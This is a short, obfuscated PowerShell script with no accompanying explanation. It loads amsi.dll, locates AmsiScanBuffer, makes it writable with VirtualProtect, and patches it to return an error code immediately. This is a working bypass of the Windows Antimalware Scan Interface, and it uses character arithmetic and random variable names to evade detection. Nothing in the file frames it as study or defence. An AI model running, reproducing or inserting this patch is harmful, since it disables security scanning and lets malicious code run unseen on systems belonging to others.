$aship = @"
using System;
using System.Runtime.InteropServices;
public class aship {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr shryim, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $aship

$qqkrsku = [aship]::LoadLibrary("$([chAR](93+4)+[CHAR](109+23-23)+[chAR]([bYte]0x73)+[CHAR](87+18)+[CHaR](46*4/4)+[CHaR]([bYTE]0x64)+[cHAR]([bYTe]0x6c)+[cHaR]([bYte]0x6c))")
$qmfsyp = [aship]::GetProcAddress($qqkrsku, "$(('ÃmsìScâ'+'nBuffer').NORmaLIze([cHaR](25+45)+[cHaR]([ByTe]0x6f)+[Char]([ByTE]0x72)+[CHar]([BYtE]0x6d)+[cHAR]([BytE]0x44)) -replace [CHaR](92+60-60)+[ChAR](112)+[cHaR]([bYTe]0x7b)+[ChAr]([bytE]0x4d)+[ChAR]([byTE]0x6e)+[cHAR]([BYTE]0x7d))")
$p = 0
[aship]::VirtualProtect($qmfsyp, [uint32]5, 0x40, [ref]$p)
$choq = "0xB8"
$ljpo = "0x57"
$kzsu = "0x00"
$zkwi = "0x07"
$crtg = "0x80"
$hwub = "0xC3"
$xktpw = [Byte[]] ($choq,$ljpo,$kzsu,$zkwi,+$crtg,+$hwub)
[System.Runtime.InteropServices.Marshal]::Copy($xktpw, 0, $qmfsyp, 6)
